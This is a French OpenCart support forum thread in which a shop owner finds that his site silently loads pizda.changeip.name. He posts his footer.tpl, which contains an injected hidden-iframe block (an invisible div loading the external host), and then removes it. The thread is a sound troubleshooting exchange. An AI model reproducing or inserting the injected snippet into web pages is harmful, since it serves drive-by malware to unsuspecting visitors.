Qu'est-ce-que pizda.changeip ?

Inscrire dans ce forum tous les types de problèmes que vous rencontrez avec OpenCart

Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 04 Mai 2012, 09:08

Bonjour,

Lorsque j'ouvre mon site via ie, la page s'ouvre sans erreurs mais lorsque je regarde l'historique, je vois qu'avant d'ouvrir ma page, ie ouvre d'abord pizda.changeip.name/ .... Qu'est-ce-que c'est que ca ? Pouvez-vous m'aider cela devient urgent. Mon site est isauto.fr.

Lorsque j'ouvre le site via firefox, alors là j'ai une alerte virus...

Que dois-je faire ?

Merci d'avanceALPINE57

Posts: 3
Joined: Mon Apr 23, 2012 6:29 pm
Private message
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
 
Messages: 6
Inscrit le: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar Imaxine » 04 Mai 2012, 09:12

Bonjour,
alpine57 a écrit:Que dois-je faire ?

Déjà dans un premier temps, compléter ta signature suivants les points importants composant la mienne, après nous pourrons voir.

Je t'en remercie.
Imaxine
 
Messages: 3023
Inscrit le: 27 Juil 2009, 19:28

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 13:12

Bonjour,

Merci pour l'info. Je viens de mettre à jour ma signature. Je suis novice, je m'excuse d'avance s'ils manquent des infos.

Alpine57
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
 
Messages: 6
Inscrit le: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar Imaxine » 05 Mai 2012, 13:23

As-tu mis un template ou as-tu modifié le thème par défaut par toi-même ou par un tiers ?
Imaxine
 
Messages: 3023
Inscrit le: 27 Juil 2009, 19:28

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 15:05

Un ami a modifié le theme par défaut en enlevant quelques boutons par-cis par là.
Le problème est apparu subitement, du jour au lendemain. Tout allait bien il y a un mois.

Merci
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
 
Messages: 6
Inscrit le: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar Imaxine » 05 Mai 2012, 15:18

Pourrais-tu poster (dans les balises destinées à cet effet) ton fichier catalog/view/theme/default/template/common/footer.tpl
Imaxine
 
Messages: 3023
Inscrit le: 27 Juil 2009, 19:28

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 16:22

La partie <---qpi--> s'insère automatiquement et contre ma volonté dans mes pages. Je constate qu'il y en a aussi dans mon footer.tpl ...

Voici le code :

Code: Tout sélectionner
<div id="footer">

  <div class="column1">
    <a href="<?php echo $home; ?>"><?php echo $text_home; ?></a>
    <a href="/index.php?route=information/information&information_id=6"><?php echo $text_about; ?></a>
    <a href="/index.php?route=product/category&path=71"><?php echo $text_cars; ?></a>
    <a href="/index.php?route=information/information&information_id=7"><?php echo $text_hours; ?></a>
    <a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a>
    <a href="/index.php?route=information/information&information_id=8"><?php echo $text_map; ?></a>
  </div>
 
 
<!--
  <div class="column1">
      <?php foreach ($informations as $information) { ?>
      <a href="<?php echo $information['href']; ?>"><?php echo $information['title']; ?></a>
      <?php } ?>
      <a href="<?php echo $sitemap; ?>"><?php echo $text_sitemap; ?></a>
      <a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a>
  </div>


  <div class="column">
    <h3><?php echo $text_information; ?></h3>
    <ul>
      <?php foreach ($informations as $information) { ?>
      <li><a href="<?php echo $information['href']; ?>"><?php echo $information['title']; ?></a></li>
      <?php } ?>
    </ul>
  </div>
 
  <div class="column">
    <h3><?php echo $text_service; ?></h3>
    <ul>
      <li><a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a></li>
      <li><a href="<?php echo $return; ?>"><?php echo $text_return; ?></a></li>
      <li><a href="<?php echo $sitemap; ?>"><?php echo $text_sitemap; ?></a></li>
    </ul>
  </div>
 
  <div class="column">
    <h3><?php echo $text_extra; ?></h3>
    <ul>
      <li><a href="<?php echo $manufacturer; ?>"><?php echo $text_manufacturer; ?></a></li>
      <li><a href="<?php echo $voucher; ?>"><?php echo $text_voucher; ?></a></li>
      <li><a href="<?php echo $affiliate; ?>"><?php echo $text_affiliate; ?></a></li>
      <li><a href="<?php echo $special; ?>"><?php echo $text_special; ?></a></li>
    </ul>
  </div>
 
  <div class="column">
    <h3><?php echo $text_account; ?></h3>
    <ul>
      <li><a href="<?php echo $account; ?>"><?php echo $text_account; ?></a></li>
      <li><a href="<?php echo $order; ?>"><?php echo $text_order; ?></a></li>
      <li><a href="<?php echo $wishlist; ?>"><?php echo $text_wishlist; ?></a></li>
      <li><a href="<?php echo $newsletter; ?>"><?php echo $text_newsletter; ?></a></li>
    </ul>
  </div>
  -->
</div>
<!--
OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donatation.
Please donate via PayPal to donate@opencart.com
//-->
<div id="powered"><?php echo $powered; ?></div>
<!--
OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donatation.
Please donate via PayPal to donate@opencart.com
//-->
</div>









<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://pizda.changeip.name/?f=997710   frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->
</body></html>
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
 
Messages: 6
Inscrit le: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 16:49

J'ai oté le code entre les balises qpi du fichier footer.tpl. C'est ok pour le moment le code qpi ne réapparait pas.

merci
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
 
Messages: 6
Inscrit le: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar Imaxine » 05 Mai 2012, 17:37

Si ton problème est résolu, je te demande de bien vouloir mettre l'icône de résolution Image dans le titre initial de ton sujet.

Je t'en remercie.
Imaxine
 
Messages: 3023
Inscrit le: 27 Juil 2009, 19:28

Re: Qu'est-ce-que pizda.changeip ?

Messagepar alpine57 » 05 Mai 2012, 17:39

oui merci de m'avoir donné une piste.
Opencart v.1.5.1
LWS
http://www.isauto.fr
alpine57
 
Messages: 6
Inscrit le: 04 Mai 2012, 09:07

Re: Qu'est-ce-que pizda.changeip ?

Messagepar Imaxine » 05 Mai 2012, 17:56

De rien.

Comme je te l'ai dit dans mon précédent message, l'icône se met dans le titre initial (c'est même mis en effet clignotant dans l'en-tête de la rédaction des messages afin que cela se voit bien !).
Imaxine
 
Messages: 3023
Inscrit le: 27 Juil 2009, 19:28


Retour vers Rapports de Problèmes

Qui est en ligne ?

Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 0 invité(s)

cron
Copyright © 2009-2013 OpenCart France - Tous droits réservés